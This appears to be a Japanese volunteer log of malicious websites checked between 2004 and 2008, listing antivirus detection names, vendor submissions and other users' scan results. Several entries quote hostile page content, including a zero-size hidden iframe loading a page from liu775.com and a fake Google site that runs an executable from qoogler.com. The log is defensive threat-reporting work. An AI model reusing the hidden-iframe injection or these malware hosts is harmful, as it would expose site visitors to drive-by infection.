通し番号. | URL( 数字→アルファベット順 )
[確認日/掲載日] 鑑定結果/解説 |
← このようになっています。 |
[2007/02/14] | 2007/02/04 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:WORM_SMALL.EXI として検出するよう対応、とのこと。 実際に 2007/02/04 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:WORM_SMALL.EXI を検出することを確認。 2007/02/04 から今日まではファイルは置き換えられていないと推測される。 |
[2007/02/14] | 2007/02/04 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:WORM_SMALL.EXJ として検出するよう対応、とのこと。 実際に 2007/02/04 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:WORM_SMALL.EXJ を検出することを確認。 2007/02/04 から今日まではファイルは置き換えられていないと推測される。 |
[2007/02/14] | 2007/02/04 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:WORM_SMALL.EXK として検出するよう対応、とのこと。 実際に 2007/02/04 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:WORM_SMALL.EXK を検出することを確認。 2007/02/04 から今日まではファイルは置き換えられていないと推測される。 |
[2007/02/14] | 2007/02/04 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:WORM_SMALL.EXL として検出するよう対応、とのこと。 実際に 2007/02/04 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:WORM_SMALL.EXL を検出することを確認。 2007/02/04 から今日まではファイルは置き換えられていないと推測される。 |
[2007/02/19] | ウィルス名:TSPY_BANKER.FPK |
[2006/08/24] | 真っ白なページ。バスター無反応だが、他社製アンチウィルスソフトではウィルス反応があると思われる。
ソースを見るとコード変換されたスクリプトが書かれている。復号化してみると VBScript である。 |
[2006/09/19] | 他の方の結果は以下の「」内。
「オンラインRPG リネージュ のサイトに飛ばされますが、その前にインフレームで変なソースのページを読み込まれます。 Kaspersky 反応なしですが、オンラインスキャンで AntiVir → VBS/Dldr.Small.AY Ewido → Downloader.Agent.m McAfee → Exploit-MS06-014 を検出。脆弱性を狙ったVBSトラップなのかな?環境によってはPC有害の可能性ありなので踏まないほうがいいでしょう。」 |
[2006/09/06] | 2006/08/26 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TSPY_LINEAGE.BGV として検出するよう対応、とのこと。 2006/08/26 にDLしたファイルからウィルス名:TSPY_LINEAGE.BGV を検出することを確認。 しかし、今日改めて当該URLからDLしてみようとするが、何度DLを試みても404であった。 |
[2006/07/24] | ウィルス名:TSPY_LINEAGE.AOB |
[2006/09/06] | 2006/08/26 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TSPY_LINEAGE.BGV として検出するよう対応、とのこと。 2006/08/26 にDLしたファイルからウィルス名:TSPY_LINEAGE.BGV を検出することを確認。 しかし、今日改めて当該URLからDLしてみると、バスター無反応。 恐らく、新しいファイルに随時置き換えられるURLと推測される。 |
[2006/09/13] | 2006/09/09 にトレンドマイクロ社にファイルを再提出。
今日、その結果の連絡があり、ウィルス名:TSPY_LINEAGE.BPD として検出するよう対応、とのこと。 2006/09/09 にDLしたファイルからウィルス名:TSPY_LINEAGE.BPD を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:TSPY_LINEAGE.BPD を検出することを確認。 |
[2008/12/14] | こんな感じ のサイト。バスター無反応だが、他社製ウィルス駆除ソフトでは反応があると思われる。
このサイトは、'Microsoft Corporation'からの'Remote Data Services Data Control'アドオンを実行しようとしている。 |
[2008/12/14] | 他の方の結果は以下の「」内。
「ランダム?でリモートアクセス関係のアドオンを実行しようとするようです。オンラインスキャンで、 Avast JS:Packed-Z GData JS:Packed-Z Sophos Mal/ObfJS-BI の反応あり。踏まないほうがいいでしょう。」 |
[2008/06/29] | こんな感じ のサイト。googleのサイトを真似しているが、ウィルス名:TSC_GENCLEAN+TROJ_AGENT.AAFX を検出。
ソースを見ると以下のファイルを実行しようとしている。 //www.qoogler.com/GobbaEvo.exe |
[2008/06/29] | ウィルス名:TSC_GENCLEAN+TROJ_AGENT.CXI |
[2008/06/29] | ウィルス名:TSC_GENCLEAN+TROJ_AGENT.AAFX |
[2008/06/29] | ウィルス名:TSC_GENCLEAN+TROJ_LOWZONE.BT |
[2008/06/29] | ウィルス名:TSC_GENCLEAN+TROJ_AGENT.ZTH |
[2008/06/29] | ウィルス名:TSC_GENCLEAN+Mal_Banker |
[2008/06/29] | ウィルス名:TSC_GENCLEAN+TROJ_STARTPA.BR |
[2006/10/18] | 海外サイトだが、ウィルス名:JS_EXCEPTION.GEN を検出。
ソースを見ると、IFRAMEタグで複数のURLを呼び出しているが、その中の以下のURLがウィルスの発動元である。 //67.15.114.122/my_stat.php |
[2006/01/12] | バスター無反応だが、Avast! で Win32:Adware-gen. を検出。 |
[2004/10/24] | //www.pillz.org/landing.phpに飛ぶが怪しい挙動。 |
[2008/08/19] | 2重拡張子。ウィルス名:TSC_GENCLEAN+TROJ_FAKEALER.FO |
[2005/11/22] | ウィルス名:SPYW_PCSPY.21 |
[2005/11/23] | ウィルス名:SPYW_REALSPY.230 |
[2005/11/23] | ウィルス名:SPYW_REALSPY.149 |
[2006/06/17] | こんな感じ のサイトだが、ウィルス名:JS_MHTREDIR.HR を検出。
ソースを見ると以下のスクリプトが2箇所に書いてある。これが元凶。 <iframe src="http://www.liu775.com/q1/index.htm"width="0" height="0"></iframe> |
[2006/06/17] | 他の方の結果は以下の「」内。
「Kaspersky 反応あり。Exploit.HTML.Mht 検出。」 「トロイの木馬 VBS/Psyme (マカフィー)を検出。」 |